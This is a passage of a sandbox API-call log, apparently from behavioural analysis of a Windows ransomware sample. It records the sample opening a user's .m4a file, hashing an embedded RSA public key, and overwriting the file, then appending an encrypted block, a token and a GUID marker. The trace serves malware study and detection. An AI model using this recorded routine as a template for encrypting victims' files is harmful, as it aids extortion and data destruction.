HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.998] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc472e30, ftCreationTime.dwHighDateTime=0x1d5b8ed, ftLastAccessTime.dwLowDateTime=0x2aae72f0, ftLastAccessTime.dwHighDateTime=0x1d5b6d6, ftLastWriteTime.dwLowDateTime=0x2aae72f0, ftLastWriteTime.dwHighDateTime=0x1d5b6d6, nFileSizeHigh=0x0, nFileSizeLow=0x146b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_t22Wh63J4UmoxVIHba.m4a", cAlternateFileName="_T22WH~1.M4A")) returned 1 [0095.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.998] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\_t22Wh63J4UmoxVIHba.m4a") returned=".m4a" [0095.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\_t22Wh63J4UmoxVIHba.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\_t22wh63j4umoxvihba.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.998] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=83634) returned 1 [0095.998] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.001] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1468c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.001] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.002] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.002] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x146b2, lpOverlapped=0x0) returned 1 [0096.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.002] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.003] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.003] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.003] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.003] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.003] GetLastError () returned 0x0 [0096.003] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.003] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.003] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.003] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.004] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x146b0) returned 0x9a06a00 [0096.004] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2460 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f24a8 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.005] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9798 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9780 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.005] GetCurrentThreadId () returned 0x8c4 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7380 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.006] GetCurrentThreadId () returned 0x8c4 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97b0 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.007] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.008] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f24a8 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.009] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x146ad, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x146ad, lpOverlapped=0x0) returned 1 [0096.009] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.009] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x146b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.009] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.010] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.010] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.010] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: 